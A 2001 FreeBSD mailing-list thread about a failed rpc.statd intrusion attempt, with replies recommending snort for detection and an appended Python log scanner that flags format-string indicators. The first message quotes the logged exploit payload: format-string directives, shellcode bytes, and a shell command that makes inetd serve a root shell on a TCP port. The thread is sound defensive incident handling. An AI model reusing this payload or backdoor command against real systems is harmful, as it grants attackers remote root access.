From owner-freebsd-questions Thu Jan 4 8:36:17 2001
Delivered-To: freebsd-questions@freebsd.org
From: "Raymond Hicks"
To: "'Guy Helmer'"
Subject: RE: hack attempt (again) - help
Date: Thu, 4 Jan 2001 11:37:32 -0500
Message-ID: <003901c0766c$a3a06fc0$d7902799@sysenglt112>

yes.. I didn't see that suggestion till after I replied... snort is my recommendation as well..

-----Original Message-----
From: Guy Helmer [mailto:ghelmer@palisadesys.com]
Sent: Thursday, January 04, 2001 10:53 AM
To: Raymond Hicks
Cc: Eric_Stanfield@kenokozie.com; freebsd-questions@FreeBSD.ORG
Subject: RE: hack attempt (again) - help

On Thu, 4 Jan 2001, Raymond Hicks wrote:

> why don't you just run a sniffer?

snort is a sniffer with a lot of good stuff (TM) to find evil things.

> -----Original Message-----
> From: owner-freebsd-questions@FreeBSD.ORG
> [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Guy Helmer
> Sent: Thursday, January 04, 2001 10:26 AM
> To: Eric_Stanfield@kenokozie.com
> Cc: freebsd-questions@FreeBSD.ORG
> Subject: Re: hack attempt (again) - help
>
> On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:
>
> > Alright this jerkoff has once again attempted to hack one of my freebsd
> > machines by trying what I assume is a buffer overflow to rpc:
> >
> > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> > ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> > %08x %08x %08x %08x %08x %08x %08x
> > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-
> > ^PëK^M-
> > v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^Cà M-^Cë#M- ^´1ÀM-^Cî
> > M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM-
> > Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>
> > /tmp/m; /usr/sbin/inetd /tmp/m;
> >
> > The interesting bit is what he (she?) is attempting to sneak in at the end
> > of the garbage sent to the port.
> >
> > I've given the system a thorough check and this seems to have been a second
> > failed attempt. I'm now annoyed, however, and would like to be able to at
> > least log what address this stuff is originating from. Can anyone suggest
> > something from the ports that would do the trick? I've disabled nfs/rpc
> > but I'm sure the hacker will come knocking again.
>
> snort with a current copy of the rule set from
> http://www.whitehats.com/ids/index.html ought to detect this (and lots of
> other script kiddie attempts).

--
Guy Helmer, Ph.D.
Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com
http://www.palisadesys.com/~ghelmer

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
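The host-side complement to the sniffer advice in the thread, as an added example that is not part of the original messages and not snort's own logic: a small Python scanner that flags rpc.statd sm_mon entries showing the format-string indicators visible in the quoted log line (%n directives, padded %x runs, raw bytes, a trailing shell command). The syslog lines it reads are constructed for the example, with the payload shortened and the command elided; the statd record never contains the peer's address, which is why the thread turns to network capture for attribution.

```python
import re

# Constructed sample syslog (not from the original thread): entry 1 mirrors the shape of the
# rpc.statd line quoted above (payload shortened, command elided), 2 is benign, 3 is unrelated.
SAMPLE_SYSLOG = (
    "Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: "
    "\x04\xf7\xff\xbf%08x %08x %08x %08x %0242x%n%055x%n%012x%n /bin/sh -c <elided>\n"
    "Jan  3 23:20:01 mrtg rpc.statd: Invalid hostname to sm_mon: fileserver.example.internal\n"
    "Jan  3 23:21:10 mrtg sshd[412]: Accepted publickey for alice from 10.0.0.5 port 51002\n"
)

# BSD syslog line: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\s\[:]+)(?:\[\d+\])?: (?P<msg>.*)$"
)


def format_string_indicators(msg: str) -> list[str]:
    """Return the reasons a logged 'hostname' looks like a printf format-string attack."""
    hits = []
    if "%n" in msg:  # the one printf directive that writes memory; never valid in a hostname
        hits.append("%n write directive")
    if len(re.findall(r"%0?\d*x", msg)) >= 4:  # padded %x runs used to walk the stack
        hits.append("run of %x stack reads")
    if re.search(r"[\x00-\x08\x0e-\x1f\x80-\xff]", msg):  # raw addresses / machine code
        hits.append("non-printable bytes")
    if re.search(r"/bin/sh|/usr/sbin/inetd", msg):  # command smuggled behind the junk
        hits.append("embedded shell command")
    return hits


def scan_statd_log(text: str) -> list[dict]:
    """Flag rpc.statd sm_mon entries carrying format-string indicators.

    Only the local host name is available here: statd does not log the peer's address.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SYSLOG_RE.match(line)
        if not m or m["prog"] != "rpc.statd" or "sm_mon" not in m["msg"]:
            continue
        hits = format_string_indicators(m["msg"])
        if hits:
            findings.append({"line": lineno, "host": m["host"], "indicators": hits})
    return findings
```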